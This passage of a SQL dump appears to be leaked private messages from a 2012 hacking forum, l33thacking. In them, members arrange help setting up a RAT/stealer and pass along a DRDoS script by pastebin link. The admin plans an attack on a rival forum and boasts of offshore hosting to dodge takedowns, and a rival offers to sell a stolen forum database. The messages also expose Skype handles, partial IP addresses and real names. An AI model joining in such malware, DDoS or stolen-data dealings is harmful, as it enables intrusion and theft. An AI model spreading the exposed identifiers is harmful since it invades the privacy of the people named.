attendence(sucks) and no GF [/quote] [/quote] [/quote] [/quote] [/quote]', '1349350334', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2373', '100', '203', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: RAT\'ing/Stealer Help', '0', '[quote=\'NeonLights\'] [quote=\'iTzGRONgamer61\'] Hey man, so you think you could help me out this weekend over skype & teamviewer with setting up my RAT/stealer? thanks! [/quote] sure but im not available this weekend im gonne camping ;) but im available friday all day whats ur skype? [/quote] skype is gavmanex I\'ll be able to voice chat later in the day friday, around 5:00-5:30 ', '1349373852', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2775', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Hey joker, are reg members able to neg rep? [/quote] Dude I swear to god I was about to PM you. Anyway, I need a new Mod not the best I can do but are you interested? I don\'t think they can. [/quote] Yes I am interested but I would prefer staff or admin but mod is okay for right now. Also since Itzipod or whatever his name is isnt mod or upgraded member could you remove his neg off of me? [/quote] Done and OK. [/quote] Thanks man, and thats why I love you NO HOMO [/quote] LOL btw I\'m planning an attack on AF are you interestd? If not then it\'s cool np. [/quote] Yes I am interested just hit me up with the info.', '1349735362', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2404', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'Never noticed :o can\'t you get in trouble for that? [quote=\'t3h jok3r\'] We do under the movies section. [quote=\'Apathy\'] We do not have movie rips? [quote=\'t3h jok3r\'] OK, ask your friends if they are interested in learning SEing, getting PIDs, movie rips etc. [quote=\'Apathy\'] I only have the one account. :/ [quote=\'t3h jok3r\'] True btw do you have any fake accounts on HF? I really need to advertise on HF never because that\'s the only place where I can get HQ members to stay on LH. [quote=\'Apathy\'] :Yea sounds pretty shitty. D: [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/ [/quote] My life is worse. [/quote] What up? :o [/quote] ATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote]', '1349409750', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2407', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'Sounds good. :) Nice homework btw. xD so wassup? I might make a nice signature or something related for the site tomorrow. What would you like on it? [quote=\'t3h jok3r\'] True I can but I like doing my homework and now this is what I have worked out. Omni wants to keep his site clean so omni would never allow rips which means we can use HF as a major traffic grabbing website. Anyway, We have a .net domain which means it will belong to the hostings server location and we are hosted in Russia so FBI can\'t take down our website. Well no authority in the USA can because we are hosted outside of the US and we don\'t even have to pay tax as nothing belongs in US. When it comes to movie copyright infringement they can send a DMCA Take Down Notice and we will remove the thread but if you go into the section, all the links should be online streaming so any issues should FIRST be resolved with the streaming website then us. If we had downloads then we would fall under distribution of Copyright Infringement but we don\'t distribute, all the content is already online. I also said in the sticky in the movie rips thread that all the links should be publicly online and not their private streams. So we are safe. [quote=\'Apathy\'] Never noticed :o can\'t you get in trouble for that? [quote=\'t3h jok3r\'] We do under the movies section. [quote=\'Apathy\'] We do not have movie rips? [quote=\'t3h jok3r\'] OK, ask your friends if they are interested in learning SEing, getting PIDs, movie rips etc. [quote=\'Apathy\'] I only have the one account. :/ [quote=\'t3h jok3r\'] True btw do you have any fake accounts on HF? I really need to advertise on HF never because that\'s the only place where I can get HQ members to stay on LH. [quote=\'Apathy\'] :Yea sounds pretty shitty. D: [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/ [/quote] My life is worse. [/quote] What up? :o [/quote] ATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote]', '1349410669', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2410', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', '[quote=\'t3h jok3r\'] [quote=\'mothered\'] [quote=\'t3h jok3r\'] [quote=\'mothered\'] [quote=\'t3h jok3r\'] [quote=\'mothered\'] Hey mate, I tried logging In, but this message came up that my IP has been banned: [IMG] http://i48.tinypic.com/214rpkp.png [/IMG] I\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums.... [/quote] Sorry for the inconvience. I mistakenly banned your IP through cloudflare because on Saturday night LH was receiving DDoS attacks. [/quote] No problem at all. I Initially thought you may have banned a range of IPs via the ACP, and mine fell Into that range. All good now :) [/quote] Thanks so do you like LH so far? [/quote] Yeah, It\'s quite a nice friendly environment to hang out. The theme reminds me of the old LH (l33thackers), but evidently, this one\'s a lot more relaxed and pleasing to navigate around. Good work with It :) [/quote] Thanks and yeah many people say that I RIPPED their theme but the truth is that this theme is free online and no one uses this because this theme is corrupted. [/quote] Yeah I know, I\'ve seen this theme being available for free. Doesn\'t matter what others think. They should get their facts right first.', '1349414198', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2412', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My site', '0', 'Hey mate, Given that my site Is not a forum and not competitive to l33thacking, would I be able to put It In my signature, just like I\'ve done with Ubers? Here\'s the site: http://www.windows8hacker.com/ If no, then I understand. ', '1349414896', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2417', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Advertising', '0', 'Greetings. I noticed you (or one of your users) were advertising on [url=http://www.anarchyforums.net]our site[/url]. Advertising on competing forums isn\'t a very reputable way of expanding. Regardless of if it was you, or one of your members I have contacted you in the interest of doing business. Since your forum is small like ours, I would be interested in purchasing it, or doing a merger. All of your users would retain their positions (except for staff), posts would be kept, and I could pay you a decent amount of money if you choose to give up administrator. If you would like to retain administrator, we can discuss your price further. I believe it would be in the best interest of both of our sites to work together somehow, as we have many active users online currently. We have 30+ active users, and it would be awesome to work with you. Let me know if you are interested in making some money, or working together. :cool: The Anarchist, Owner of Anarchy Forums ', '1349444686', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2429', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey Im back . I have a error', '0', 'Hey I came back from my school trip. But I cant access this site. with my normal browser. I m writing this pm over the tor browser. Is it posssible that you have banned me? The owner of this website (l33thacking.net) has banned your IP address (188.155-----). (Ref. 1006) Timestamp: Fri, 05 Oct 2012 10:41:30 -0700 Your IP address: 188.155----- Requested URL: l33thacking.net/ Error reference number: 1006 Server ID: FL_18F1 Process ID: PID_1349458890.150-1-1218762472 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 ', '1349458995', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2443', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Advertising', '0', '[quote=\'t3h jok3r\'] [quote=\'The Anarchist\'] Greetings. I noticed you (or one of your users) were advertising on [url=http://www.anarchyforums.net]our site[/url]. Advertising on competing forums isn\'t a very reputable way of expanding. Regardless of if it was you, or one of your members I have contacted you in the interest of doing business. Since your forum is small like ours, I would be interested in purchasing it, or doing a merger. All of your users would retain their positions (except for staff), posts would be kept, and I could pay you a decent amount of money if you choose to give up administrator. If you would like to retain administrator, we can discuss your price further. I believe it would be in the best interest of both of our sites to work together somehow, as we have many active users online currently. We have 30+ active users, and it would be awesome to work with you. Let me know if you are interested in making some money, or working together. :cool: The Anarchist, Owner of Anarchy Forums [/quote] Firstly, I apologize behalf of my forum for advertising a competing website on your forums. Is it possible that I could get a copy of the PM? Secondly, Thanks for the offer but I\'m not interested however if you sell your DB to me then I will pay a good price for it, make you an Admin and you will earn 30% of whatever I earn. Lastly, Don\'t take me wrong but you haven\'t taken out time to secure your site, you don\'t have as much HQ & DAILY Active members that I have and we have more content then your site so it\'s better for you to move into my website plus I will give you a written guarantee that you will not be removed from your Admin spot for an year and you will earn 30% from whatever I earn. I have worked out too many deals and paid a lot of advertising and my website is planning to hit 1K HQ threads under the next 40 days. [/quote] Actually, our site is fairly secure. We have no intentions of merging, and I am not interested in selling our database. However, if you\'re interested in buying databases, I can offer you Blackmarket.cc\'s old database (unmodified). Their forum was quite large. Let me know if you change your mind. :cool: I\'m sure you will eventually. Here\'s the PM: [quote=\'lily\'] Hi, I run a blackhat forum similar to HF but with less rules and more blackhat discussions such as phi$hing, PIDs, Social Enginering, Movie RIPs, Premium Accounts and much more. We are kinda new because our site was launched about 2 months ago but we already have 655+ HQ threads and 15+ daily active members. All our downloads are public which means no post here and PM me BS. Give our forum a try and we will make sure you won\'t regret it. In return we can even provide you a free lifetime forum upgrade. Link: http://l33thacking.net/ [/quote] Regarding users and posts, we actually have more, with over 20 users online as I speak (on Skype). If you do change your mind, contact me via our site. - The Anarchist, Owner of Anarchy Forums.', '1349462157', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2449', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'ohhidur', '0', 'I got this message.... I run a blackhat forum similar to HF but with less rules and more blackhat discussions such as phi$hing, PIDs, Social Enginering, Movie RIPs, Premium Accounts and much more. We are kinda new because our site was launched about 2 months ago but we already have 655+ HQ threads and 15+ daily active members. All our downloads are public which means no post here and PM me BS. Give our forum a try and we will make sure you won\'t regret it. In return we can even provide you a free lifetime forum upgrade. When will I be able to receive premium :D', '1349463095', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2451', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hello', '0', '[quote=\'t3h jok3r\'] Firstly, Welcome to L33THacking and thanks for signing up. Secondly, I found out about the PM and found out that one of my staff members were advertising on AF. Anyway, since you did sign up and actually started contributing so I will provide you with a upgrade and just to let you know what differs LH and other sites is that l33thacking has a Movie RIPs section, PIDs, Social Engineering, Premium Accounts, Cracked programs sections and much more. I will upgrade you when I get back home. [/quote] oh haha disregard my other message then :P', '1349463153', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2457', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] Is your real name Logan Turner? [/quote] nope why? not even close to logan turner :/', '1349472716', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2459', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: fianlly ur on', '0', '[quote=\'NeonLights\'] did u chec kmy request in ur gfx thread :D::DD::D:D:D:D:D:D:D:D:D:D::D:D:D:D:E [/quote] i saw it bro, however I\'m short on time :( i dunno how you want the big worm though, mind explaining.', '1349472757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2515', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My site', '0', '[quote=\'t3h jok3r\'] [quote=\'mothered\'] Hey mate, Given that my site Is not a forum and not competitive to l33thacking, would I be able to put It In my signature, just like I\'ve done with Ubers? Here\'s the site: http://www.windows8hacker.com/ If no, then I understand. [/quote] Sure it\'s not a problem. [/quote] Thanks bud, really appreciate It. Just wanted to check with your first, before making any decisions. ', '1349500195', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2517', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey Im back . I have a error', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] Hey I came back from my school trip. But I cant access this site. with my normal browser. I m writing this pm over the tor browser. Is it posssible that you have banned me? The owner of this website (l33thacking.net) has banned your IP address (188.155-----). (Ref. 1006) Timestamp: Fri, 05 Oct 2012 10:41:30 -0700 Your IP address: 188.155----- Requested URL: l33thacking.net/ Error reference number: 1006 Server ID: FL_18F1 Process ID: PID_1349458890.150-1-1218762472 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 [/quote] I did ban you but not intentionally. Well few days ago LH received a heavy DDoS attack so I increased the security level and when it did what happened was that it marked everyone on the site as a threat so I mass banned them so I mistakenly banned many legit members such as mothered, Ipod, Grongamer and many more. Can I have your real IP? [/quote] Hey Im unbanned. Everything is fine. Did you lower the security level again? I hope it stays like this. ', '1349514757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2519', '100', '225', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"225\";}}', '2', 'Re: Ello!', '0', '[quote=\'Graycat\'] Eyy ima friend of NXK, and i was wondering if you could hook me up with that drdos script. thanks in advance [/quote] Sure thing, heres the pastebin. http://pastebin.com/EgnhCsGm', '1349524000', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2524', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey Im back . I have a error', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] [quote=\'sirchamp\'] Hey I came back from my school trip. But I cant access this site. with my normal browser. I m writing this pm over the tor browser. Is it posssible that you have banned me? The owner of this website (l33thacking.net) has banned your IP address (188.155-----). (Ref. 1006) Timestamp: Fri, 05 Oct 2012 10:41:30 -0700 Your IP address: 188.155----- Requested URL: l33thacking.net/ Error reference number: 1006 Server ID: FL_18F1 Process ID: PID_1349458890.150-1-1218762472 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 [/quote] I did ban you but not intentionally. Well few days ago LH received a heavy DDoS attack so I increased the security level and when it did what happened was that it marked everyone on the site as a threat so I mass banned them so I mistakenly banned many legit members such as mothered, Ipod, Grongamer and many more. Can I have your real IP? [/quote] Hey Im unbanned. Everything is fine. Did you lower the security level again? I hope it stays like this. [/quote] Nope, the message you sent me said the IP 188.155.XXXX so I searched up all the IPs on 188.155 and there was only one so I thought it was yours. [/quote] Oh sorry. I hope it wasnt much work. Thanks for unbanning me.', '1349557835', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2526', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'me', '0', 'Did you seriously just post my name on forums..? s', '1349559695', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2528', '62', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'se keyboard', '0', 'could you help me on this bro?', '1349565633', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2530', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: se keyboard', '0', '[quote=\'R?????zo?\'] could you help me on this bro? [/quote] yeh what kind...logitech right', '1349566663', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2532', '62', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: se keyboard', '0', '[quote=\'flamingworm\'] [quote=\'R?????zo?\'] could you help me on this bro? [/quote] yeh what kind...logitech right [/quote] yeah if its logitech, what keyboard can you SE from them', '1349567270', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2534', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: se keyboard', '0', '[quote=\'R?????zo?\'] [quote=\'flamingworm\'] [quote=\'R?????zo?\'] could you help me on this bro? [/quote] yeh what kind...logitech right [/quote] yeah if its logitech, what keyboard can you SE from them [/quote] I can do them all lol.....', '1349568790', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2538', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Did you seriously just post my name on forums..? s [/quote] Damn I thought it was Reloadzor. Sorry but I was going to junk the thread anyway. Do you know who spencer weeks is? [/quote] Yeah lol, Sorry about him. We were drinking that night and he saw you guys from when I liked the page and he was like \"I wonder if they can hack my phone n stuff\" and try\'d to make you mad.. but I told him after I said, \"Mate i\'m staff on that website what are you doing\" and he was like oh shit lol.. yeah sorry.', '1349570184', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2541', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', 'Don\'t take any offense he\'s just a troll', '1349570369', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2544', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Don\'t take any offense he\'s just a troll [/quote] Alright and sorry for posting your name on LH. [/quote] No problem, I told him to stop anyways.', '1349570470', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2547', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', 'Working on some homeowork, than going out. All my friends are home from college since it\'s canadian thanksgiving this weekend. ', '1349570785', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2668', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', '[quote=\'t3h jok3r\'] I was wondering are you interested in becoming the new leader of the Unique group? [/quote] I will be to become the new leader of Unique.', '1349685111', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2670', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', '[quote=\'t3h jok3r\'] I was wondering are you interested in becoming the new leader of the Unique group? [/quote] I will be happy* damn phone', '1349685160', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3010', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin?', '1350093559', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3007', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.', '1350093048', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2702', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: i need you PLZ', '0', '[quote=\'NeonLights\'] i was wondering if u could make me a userbard similar to this one: [img]http://imageshack.us/a/img802/7561/ratters.gif[/img] but make the ratters green,red,yellow :D if its prossible plz i really need this for my group to work out il give u a spot if u want :) plz reply soon [/quote] i will do this bro. no worries.', '1349728015', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4129', '2', '4', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"4\";}}', '2', 'Re: Help', '0', '[quote=\'Triple H\'] I\'m t3h jok3r and I got hacked. Add me on skype t3hjok3r Come online asap. [/quote] I got to go to school. D: I will be online when I get back.', '1352811673', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3003', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking.', '1350092550', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, 